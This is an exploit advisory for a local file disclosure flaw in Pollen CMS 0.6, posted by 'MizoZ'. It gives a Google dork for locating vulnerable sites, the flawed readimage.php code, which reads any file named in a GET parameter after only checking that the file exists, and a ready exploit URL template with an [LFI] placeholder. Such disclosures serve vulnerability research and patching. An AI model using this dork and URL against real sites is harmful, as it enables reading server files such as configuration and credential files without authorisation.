# Title: Pollen CMS <= 0.6 - Local File Disclosure # Google Dork: intext:"Powered by Pollen CMS" # Date: 25 Mars 2013 # Exploit Author: MizoZ # Vendor Homepage: pollencms.com (BROKEN) # Software Link: https://code.google.com/p/pollencms/ # Version: 0.6 # Tested on: Ubuntu Desktop 12.04 -- File "[path]/core/lib/readimage.php" 02 - $image=urldecode($_GET["image"]); 03 - if(is_file($image)){ 04 - header("Pragma: no-cache"); 05 - header("Expires: 0"); 06 - header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT"); 07 - header("Cache-Control: no-cache, must-revalidate"); 08 - header("Content-type: image/jpg"); 09 - readfile($image); 10 - }else{ 11 - header("HTTP/1.0 404 Not Found"); 12 - } -- Problem The script only verifies the existence of the given file. -- Exploit http://[ws]/[path]/core/lib/readimage.php?image=[LFI]